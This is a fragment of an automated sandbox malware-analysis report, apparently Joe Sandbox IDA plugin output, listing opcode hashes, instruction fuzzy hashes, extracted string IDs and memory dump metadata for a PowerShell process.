                                                              • String ID: /N_I$0K6K$8I6K$H16K$XJ6K$xK6K$/6K$J6K
                                                              • API String ID: 0-75804232
                                                              • Opcode ID: 66105e648f1ac58543fc49ad98ff0993a4fc8d14e1fa8afe61ba76116388c114
                                                              • Instruction ID: 7a1c660a26480fddb401406843bdc26dba43d1fefcfd5a4b950c49f1ac6a5aaa
                                                              • Opcode Fuzzy Hash: 66105e648f1ac58543fc49ad98ff0993a4fc8d14e1fa8afe61ba76116388c114
                                                              • Instruction Fuzzy Hash: 2A417D83E0DAD60BE315AA7CA8195346FC1FF92295B4585BAD1C8C72DBED186C1143C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1878382937.00007FFB4B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B040000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffb4b040000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0u&K$@r&K$H$K
                                                              • API String ID: 0-2382964246
                                                              • Opcode ID: 05cd0089c0450ad8091365923bcfc2c90afa5d2a83dc0293289a0d2849042bee
                                                              • Instruction ID: 2920c29a602e76a4d08fe6d69922cf06f98da34651933775cd05380e6ec331f8
                                                              • Opcode Fuzzy Hash: 05cd0089c0450ad8091365923bcfc2c90afa5d2a83dc0293289a0d2849042bee
                                                              • Instruction Fuzzy Hash: 73C19270A1CA5D8FDF98EF68C455AE97BE1FF68301F1441A9D409D7296DA34EC81CB80